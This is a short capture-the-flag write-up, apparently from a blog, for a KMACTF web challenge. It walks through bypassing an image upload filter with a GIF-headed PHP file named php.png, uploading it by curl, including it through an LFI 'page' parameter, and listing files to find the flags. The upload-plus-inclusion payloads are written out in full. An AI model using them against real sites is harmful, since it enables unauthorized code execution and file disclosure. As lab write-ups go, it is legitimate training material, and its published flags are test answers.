IT'S ALMOST THE EASIEST CHALL IN THIS COMPETITON !
THIS IS THE FIRST PART OF THE FLAG .
DECODE THIS
FLAG KMACTF{Ctrl_U_is_helpful!_Wh4t_do3s_JS_Say.?}
WEB 01 :
THIS CHALL IS ABOUT LFI + FILE UPLOAD CHALLENGE
FIRSTLY , WE MUST BYPASS IMAGE UPLOAD MECHANISM . WE MUST UPLOAD BY CURL COMMAND .
curl -L -F 'file=@image.png' -H "API-KEY: my_api_key" http://cloud-storage.ctf.actvn.edu.vn:8080/api.php
MY "IMAGE" IS SOME LINES OF PHP CODE WITH GIF HEADER AND php.png EXTENSION TO BYPASS IMAGE UPLOAD RETRICTIONS .
GIF89a;<?php$path = getcwd();$items = scandir($path);echo "<p>Content of $path</p>";echo '<ul>';foreach ($items as $item) {echo '<li>' . $item . '</li>';}echo '</ul>';?>
THIS PHP CODE ABOVE WILL GIVE US THE CURRENT LOCATION AND ALL FILE&FOLDER IN THIS .
ACTUALLY I HAVE NO MORE EXP WITH CURL . SO . WITH THIS CURL , I CAN'T UPLOAD IMAGE TO THE SERVER , BECAUSE OF THE SINGLE QUOTE (' ') in 'file=@image.png' . LET'S SEE !
AFTER REMOVE THE SINGLE QUOTE , I CAN COMPLETELY UPLOAD "IMAGE" TO THE SERVER.
NEXT STEP , I INCULDE THIS FILE VIA LFI PARAM "page"
SUCCESSFULLY !
I READ ALL FILES IN THIS FOLDER BUT NOTHING REALLY USEFUL .
SO I USE THIS CODE TO ENUMERATE ALL PHP file in /home FOLDER
GIF89a;<?phpforeach (glob("/home/*.php") as $filename) {echo "$filename";}?>
AND FORTUNETELY IT'S WORK ! A FILE NAMED flag.php IN THIS FOLDER .
LET'S CHECK IT !
FLAG :KMACTF{php is not a good choice for web development}
Không có nhận xét nào:
Đăng nhận xét